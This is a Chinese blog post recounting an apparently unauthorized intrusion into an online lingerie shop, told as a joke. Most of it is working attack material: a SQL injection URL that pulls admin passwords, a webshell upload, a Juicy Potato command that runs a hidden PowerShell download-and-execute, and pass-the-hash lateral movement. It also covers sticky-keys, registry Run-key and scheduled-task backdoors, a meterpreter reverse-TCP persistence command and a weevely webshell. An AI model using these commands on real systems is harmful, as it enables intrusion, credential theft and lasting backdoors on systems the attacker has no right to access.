記一次內衣滲透測試

2021-02-18 HACK學習呀

文章很水,被學校強迫去上syb創業指導課,同桌上課難耐,人多又不敢去p站看考研視頻,只能逛逛這些nei衣店緩衝一下,於是就有了下文

0x01 SQL注入

這站真大,不對,這站真圓.php的站隨便隨便一測

一枚注入

因為只能讀取32位所以使用substring分開讀取 https://aaaa.com/1.php?id=210%20and%20extractvalue(1,concat(0x7e,(select password from admin limit 1,1),0x7e))%20# https://aaaa.com/1.php?id=210%20and%20extractvalue(1,concat(0x7e,substring((select password from admin limit 1,1),30,35),0x7e))%20#

舒服了,這下可以給光明正大的進去選內衣了

0x02 拿shell

看看robots.txt

inurl:a.com admin

進入後臺發現是ECSHOP 這裡原本是file改為image繞過

似乎不行被重置了

這裡發現可以執行sql語句而且存在絕對路徑洩露

ok下面就好說了,寫入一句話

0x03 提權

權限有點小低

存在mysql也沒其他可以利用的

嘗試mysql提權

除了目錄不能上傳其他條件都滿足所以當我沒說,上cs,powershell上線

提權這裡使用Juicy Potato 具體可以參考三好學生文章 選擇想要的任何CLSID,連結

然後我們在以system權限執行powershell

shell style.exe -p "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('powershell地址'))\"" -c {e60687f7-01a1-40aa-86ac-db1cbf673334}

這裡面的雙引號記得轉義

0x04 橫向滲透

為工作組環境,掃出來0.9也是一臺web這裡hash傳遞直接拿下,繼續抓hash,目前以有如下帳戶 wiseadmin shopaccount mysql wiseadmin filetransfer demoadmin WDAGUtilityAccount

平平無奇hash傳遞--

一個應該是web的的一個demo,然後0.7可能是資料庫伺服器

都是admin權限了如果想要獲取system的話可以使用SelectMyParent,其實也就是j把新進程當中system進程的子進程,這裡就用cs的馬,先查看winlogon.exe的pid

可以看到這裡為500

然後把我們的systen.exe上傳,執行shell SelectMyParent.exe systen.exe 500

這步操作其實就是湊點字數 ,哈哈哈哈

0x05 權限維持 

這裡就拿本機測試了

粘滯鍵後門 在windows上連續按5次「Shift」,就可以調出粘滯鍵

粘滯鍵指的是電腦使用中的一種快捷鍵,專為同時按下兩個或多個鍵有困難的人而設計的。粘滯鍵的主要功能是方便Shift等鍵的組合使用。粘滯鍵可以先按一個鍵位(如shift),再按另一鍵位,而不是同時按下兩個鍵位,方便某些因身體原因而無法同時按下多鍵的人。一般的電腦連按五次shift會出現粘滯鍵提示

使用如下命令

cd windows\system32move sethc.exe sethc.exe.bakcopy cmd.exe sethc.exe

如果目標機是 winvista 以上的,即 winvista 以後出的系統,修改 sethc 會提示需要 trustedinstaller 權限,所以想要繼續,那就需要修改所有者為Administrator,並修改其權限:

然後修改為完全控制

現在我們連續按下5次shift就彈出一個system權限的cmd

註冊表注入後門 在普通用戶權限下,攻擊者將會需要執行的後門程序或者腳本路徑寫到註冊表 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 鍵值可以任意設置,或者直接執行如下命令添加啟動項 REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v test /t REG_SZ /d "C:\shell.exe" 當管理員重新登錄系統時,就會執行後門程序

計劃任務後門 

命令:schtasks /Create /tn Updater /tr c:\shell.exe /sc hourly /mo 1

以上的命令會在每小時執行一次shell.exe,在win7及以下的系統使用at命令代替schtasks

meterpreter後門 

meterpreter > run persistence -U -i 5 -p 1234 -r 192.168.220.128 -A 自動啟動一個匹配的exploit / multi / handler來連接到代理 -L 如果未使用%TEMP%,則在目標主機中寫入有效負載的位置。-P 有效負載使用,默認為windows / meterpreter / reverse_tcp。-S 作為服務自動啟動該木馬(具有SYSTEM權限) -T 要使用的備用可執行模板 -U 用戶登錄時自動啟動該木馬 -X 系統引導時自動啟動該木馬 -h 這個幫助菜單 -i 每次連接嘗試之間的時間間隔(秒) -p 運行Metasploit的系統正在偵聽的埠 -r 運行Metasploit監聽連接的系統的IP

缺點是容易被殺毒軟體查殺,然後它就在目標機新建一個vbs文件,然後每次自動啟動他

web後門的話可以使用weevely 這裡生成一個shell.php來測試

將文件放入伺服器目錄下,然後執行 

weevely http://192.168.220.1/shell.php

shell 可以help查看幫助 

audit.etcpasswd | 枚舉/etc/passwd audit.userfiles | 列舉用戶/home下具有權限的文件 audit.mapwebfiles | 枚舉任意Web站點的URL連結 shell.php | 編寫php文件 shell.sh | 編寫系統腳本 system.info | 收集系統信息 find.suidsgid | 查找SUID / SGID文件和目錄 find.perms | 查找權限可讀/寫/可執行文件和目錄 backdoor.tcp | TCP埠後門 backdoor.reversetcp | 反彈TCP連接 bruteforce.sql | 爆破指定資料庫用戶名密碼 bruteforce.sqlusers | 爆破所有資料庫用戶密碼 file.upload | 上傳本地文件 file.upload2web | 上傳二進位/ ASCII文件至目標站點文件夾並枚舉URL file.enum | 在本地詞表的書面枚舉遠程文件 file.read | 讀文件 file.rm | 刪除文件 file.check | 檢查遠程文件的狀態(md5值,大小,權限等) file.download | 下載遠程二進位/ ASCII文件到本地 sql.console | 啟動SQL控制臺 sql.dump | 備份資料庫,即脫庫net.scan | 埠掃描net.phpproxy | 安裝遠程php代理 net.ifaces | 顯示遠程主機網絡接口信息 net.proxy | 安裝隧道通信代理

執行一些windows命令

執行自帶命令

點讚 在看 轉發

原創投稿作者:一寸一葉

相關焦點

  • 記一次偶然發生的滲透測試
    0x00 信息搜集話還要從最近網上轉載的一篇文章說起—據說某家校通系統存在後臺萬能密碼登錄—於是點進去看了一下,然後從文章的某些特徵猜到了這個家校通系統,之後就某度一波,然後就發現一堆網站,隨便挑了一個,進行測試。找到測試目標,找到後臺入口,然後開始搞事情
  • 第一次滲透測試的分享和小結
    ,但是因為一些現實因素等等問題,沒(bu)有(gan)真正實操,最近由於一次偶然的機會,什麼都不會的我接到了一個滲透測試項目然後就把最近學到的一些東西,和一些小感悟,小技巧記錄下來,由於一些特殊原因,本文中不涉及到滲透過程中的任何敏感信息二、第一次進行滲透如何優雅的"裝"成是個"老手"首先跟我一樣菜當然是裝不出大神的,當然還是多學,多積累
  • 入門滲透測試學習經驗分享
    這篇文章面向入門滲透測試的同學,更偏向於學習的方法,而非滲透的技巧,請看準需求再往下讀。我是SINESAFE網站安全公司的技術,水平有限,所以自然親民,和很多滲透測試新手都很熟。他們中的大多數都是大學生,還有很多年的工作,但一直對網絡安全保持著熱情。
  • 淘寶內衣攜手iFashion商家 國內五大知名內衣品牌上演「夢境奇遇記」
    淘寶內衣攜手iFashion商家 國內五大知名內衣品牌上演「夢境奇遇記」,圖片來源於淘寶內衣。淘寶成立14年,始終在「為中國製造崛起」的路上前行。本次內衣展藉由淘寶這一全民購物平臺,讓優質的國產內衣品牌有機會讓更多國人了解、熟知,最終也能走向國際。
  • 紙尿褲防水透氣膜對水蒸氣滲透性能測試方法
    摘要:防水透氣膜的水蒸氣滲透性能是影響紙尿褲舒適性的重要因素。本文利用杯式法原理測試了紙尿褲用防水透氣膜樣品的水蒸氣透過率,並介紹了試驗原理,相關設備測試參數、適用範圍及試驗過程等內容,為相關防水透氣膜類材料透溼性能的測試提供參考。
  • Windows滲透測試工具CommandoVM安裝使用教程
    2019年3月28日,火眼發布了一個包含超過140個開源Windows滲透工具包含140個滲透工具,紅隊滲透測試員和藍隊防禦人員均擁有了頂級偵察與漏洞利用程序集。該工具集名為「CommandoVM」.火眼旗下麥迪安網絡安全公司顧問以及Commando VM套件的聯合創建者 Jake Barteaux 表示:在進行內部滲透測試時,我身邊的大部分滲透測試工程師都會先自行配置一個Windows測試環境。能不能把這個環境配置好,配得有多快,已然成為了衡量滲透測試工程師手藝高低的標準了。
  • 網站滲透測試報告速寫模板指南
    網站滲透測試服務在給客戶寫報告模板或者檢查表的時候,應逐步完善。寫報告在滲透測試中耗費大量的時間和精力。花費的時間取決於客戶和經理期望的交付成果。(中文大概意思是客戶和老闆能不能看懂你的報告)獎勵項目報告通常比滲透測試報告短,但是無論什麼格式,您都將受益於為每個文檔和測試類型創建模板(黑盒、白盒、Web、網絡、wifi)。理想情況下,您的滲透測試模板應包括:通常測試的測試列表。有時候客戶會問這個,提前做好準備。
  • web滲透測試對信息收集的方法介紹
    什麼是web滲透測試?一般是指通過模擬黑客的攻擊手法,對計算機網絡系統進行安全評估測試,如果發現系統中存在漏洞,向被測試系統的所有者提交滲透報告,並提出補救措施。這一章將通過滲透測試Web應用和伺服器,向大家介紹滲透測試的方法和技巧。
  • 2021暗月滲透測試全棧學習班
    7課01 內網滲透篇_隧道技術ssh隧道02 內網滲透篇 埠轉發與埠映射03 內網滲透篇_隧道技術socket隧道04 內網滲透篇_跨路由掃描05 內網滲透篇_常見的內網測試06 內網滲透篇_域的搭建07 內網滲透篇一次完整的域滲透第十五天 exp編寫篇8課01 注入exp的簡單編寫02 簡單注入exp編寫 python03 POST注入exp編寫04 getshell exp編寫05 需要驗證的
  • 2020暗月滲透測試全棧學習班
    mysql資料庫數據的增刪改查資料庫04-mysql資料庫數據的查詢語句資料庫05-mysql資料庫子查詢資料庫06-mysql的內連結 左連接 右連接資料庫07-IFORMATION_SCHEMA詳解和SQL注入語句分析第四天 基礎知識6課01物理機的環境搭建02網站基礎知識03詳解HTTP協議04埠協議05網站搭建vps購買 域名 解析 伺服器配置06搭建 https網站07安裝kali和配置08滲透測試中的常用編碼第五天
  • 滲透測試工具小抄
    介紹滲透測試工具作弊表,典型穿透測試工作的快速參考高級概述。設計為快速參考作弊表,提供執行滲透測試時將運行的典型命令的高級概述。
  • 註冊滲透測試工程師認證 | CISP-PTE證書含金量怎麼樣
    註冊滲透測試工程師(CISP-PTE)認證是由中國信息安全測評中心針對攻防專業領域實施的資質培訓, 是國內唯一針對網絡安全滲透測試專業人才的資格認證,是目前國內最為主流及被業界認可的專業攻防領域的資質認證,也是國家對信息安全人員資質的最高認可。
  • 如何入門網站安全滲透測試
    從大學畢業的時候開始簡單入門,寫寫網站程序代碼,搞搞sql注入以及安全測試,到現在Sinesafe當安全工程師,差不多在安全行業成長了11年,發現不懂得問題隨著實戰滲透測試中非常多,還是學到老乾到老才是成功之道。
  • 【滲透實戰】記一次艱難的內網漫遊之旅_拿下472臺主機shell!
    ,為了這次的滲透能夠順利,我做了近兩周的準備。11)可惜不是弱口令,那麼用burpsuite抓個包看看有沒有漏洞,發現有個command參數:12)上網查找了銳捷路由器的資料後發現這是用來測試用戶是否有路由器權限的如果帳號密碼錯誤,response則是401 Unauthorized13)繼續查找資料,發現show version這個命令是不用權限就能執行的你懂得
  • 滲透測試學習書籍推薦
    該書雖比《Web安全攻防:滲透測試實戰指南》少了56頁,但是就Web滲透的內容來說會更加深入、細緻,適合有一定計算機基礎的人閱讀學習。這樣一位身經百戰的安全專家,我能感覺到他在努力地講解web滲透的技術,但是20年的經歷使得他的安全視角變得非常高,不會拘泥於其中的技術細節,更多的是其安全觀的闡述和安全理論的表達。
  • 記對某cms的滲透測試
    通過本次的測試,望能夠引起站長們的注意。及時更新補丁!!管理員密碼重置漏洞首先,我們訪問目標後臺https:///xxxx.com/admin/admin/login/login.php一頓 666666走起,萬一成功進入後臺呢?
  • 滲透測試專業人員使用的11種工具
    滲透測試是模擬一種網絡攻擊,在真正的黑客入侵之前,模擬黑客入侵企業網絡來發現薄弱之處。就像電影《Sneakers》一樣,黑客顧問闖入公司網絡以發現網絡的弱點。其中,滲透測試人員或白帽都使用了黑客可用的工具和技術。回到過去的舊時代,黑客入侵是一件非常困難的事,並且需要大量的手動操作。
  • 滲透測試團隊技術評級那些事兒
    我們在設計這套技術定級體系的時候倒的確查閱了很多招聘信息,也發現有些滲透測試崗位的招聘信息算是千篇一律的內容,不管是初級安全工程師還是高級滲透工程師好像都是那麼幾條,而我們這篇文章的內容有些的確比較適合用來設計不同級別的滲透測試崗位招聘信息的。
  • BlackArch Linux 2020.12.01 發布,滲透測試發行版
    時隔半年,BlackArch Linux 發布了2020年的最後一次版本更新 2020.12.01,新版本增加了超過 100 款工具,官方表示 BlackArch Linux 目前包含的工具超過了
  • 滲透測試 對文件上傳安全檢測與webshell分析
    前段時間我們SINE安全收到客戶的滲透測試服務委託,在這之前,客戶網站受到攻擊,數據被篡改,要求我們對網站進行全面的滲透測試,包括漏洞的檢測與測試,邏輯漏洞.垂直水平越權漏洞,文件上傳漏洞.等等服務項目,在進行安全測試之前,我們對客戶的網站大體的了解了一下,整個平臺網站,包括APP,安卓端,IOS端都採用的JSP+oracle資料庫架構開發,前端使用VUE,伺服器是linux